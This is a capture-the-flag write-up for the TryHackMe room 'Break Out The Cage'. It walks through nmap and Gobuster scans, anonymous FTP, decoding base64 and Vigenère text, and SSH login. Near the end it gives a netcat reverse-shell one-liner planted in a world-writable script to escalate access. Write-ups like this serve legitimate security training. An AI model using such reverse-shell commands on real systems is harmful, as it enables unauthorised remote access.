[EN] Break Out The Cage WriteUp
Hello everyone, in this article, we will be solving the room named “Break Out The Cage” in TryHackMe together. Let’s get started right away.
Room’s Link: https://tryhackme.com/room/breakoutthecage1
First of all, let’s scan the ip address given to us with nmap.
sudo nmap -A 10.10.7.223
We have 4 ports open, at the same time we see that we can log in anonymously via FTP. Let’s try.
After connecting to FTP anonymously with the help of Filezilla, we find a file called dad_tasks. Let’s download.
When we open the file, we see a text encrypted with base64, when we decode it, we see a text like the one below.
Qapw Eekcl – Pvr RMKP…XZW VWUR… TTI XEF… LAA ZRGQRO!!!!
Sfw. Kajnmb xsi owuowge
Faz. Tml fkfr qgseik ag oqeibx
Eljwx. Xil bqi aiklbywqe
Rsfv. Zwel vvm imel sumebt lqwdsfk
Yejr. Tqenl Vsw svnt “urqsjetpwbn einyjamu” wf.
Iz glww A ykftef…. Qjhsvbouuoexcmvwkwwatfllxughhbbcmydizwlkbsidiuscwl
This text is encrypted with “vignere cipher”, to decrypt it first we need a key.
When looking at the open ports, we saw that port 80 was open, so a website is up. Let’s scan the directories with Gobuster.
When we dig through the directories a little bit, we find the directory named “auditions”, there is an audio file in it. When we open the audio file, we encounter a parasitic speech. Thinking that something is hidden inside, we open it with AudoCity and look at the spectrogram, and we reach the key of the vignere cipher.
After deciphering the password with the key, we reach our new text, it contains the password of the weston user we need.
Dads Tasks – The RAGE…THE CAGE… THE MAN… THE LEGEND!!!!
One. Revamp the website
Two. Put more quotes in script
Three. Buy bee pesticide
Four. Help him with acting lessons
Five. Teach Dad what “information security” is.
In case I forget…. *************************************************
We log in to SSH as the user named “weston” with the above password.
Now that we’re logged in, let’s look for the files belonging to cage.
find / -user cage 2> /dev/null
The file “/opt/.dads_scripts/spread_the_quotes.py” caught my attention, let’s take a look at its contents. It has a python script in it, and when I look at its permissions, I see that everyone has the authority to change the file, which is ideal for adding a reverse shell.
With this command, we added our reverse shell to the quotes file.
echo “asd; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.52.178 1212 >/tmp/f” > .quotes
And we are in! Let’s read the user flag.
Stay tuned for more content!